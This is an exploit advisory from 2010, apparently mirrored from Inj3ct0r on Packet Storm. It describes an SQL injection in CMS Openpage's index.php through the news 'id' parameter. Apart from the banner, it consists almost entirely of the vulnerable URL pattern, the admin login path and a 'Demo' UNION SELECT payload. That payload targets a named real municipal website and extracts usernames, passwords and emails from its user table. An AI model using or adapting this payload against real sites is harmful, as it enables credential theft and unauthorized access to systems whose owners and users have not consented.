CMS Openpage suffers from a remote SQL injection vulnerability.
af10c62a5f94ce2d6d1a0df1a60e704751379fa94cb367f54f0b399f0368ab02
====================================================
CMS Openpage (index.php) SQL Injection Vulnerability
====================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ###################################### 1
0 I'm Phenom member from Inj3ct0r Team 1
1 ###################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] Discovered by: Phenom
[+] My id: http://inj3ct0r.com/author/2157
[+] Original: http://inj3ct0r.com/exploits/9666
# Exploit Title: CMS Openpage (index.php) SQL Injection Vulnerability
# Tested on: windows xp sp3
# Code :
>>[Author] = Phenom
>>[CMS] = CMS Openpage
>>[Dork] = I hate script kiddies
>>[Date] = 2010-03-22
>>[Exploit] :
[Bug] = [index.php?pagina=news&id=]
[Usage] = http://www.site/index.php?pagina=news&id=[SQL Injection]
[Login] = http://site/index_priv.php
>>[Demo] :
[+] http://www.comunevillafrancainlunigiana.it/index.php?pagina=news&id=-5+union+select+1,group_concat%28concat%28username,0x3a,password,0x3a,email%29%20separator%200x3c62723e%29,3,4,5,6,7,8,9,10+from+utenti--
# Inj3ct0r.com [2010-03-22]
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed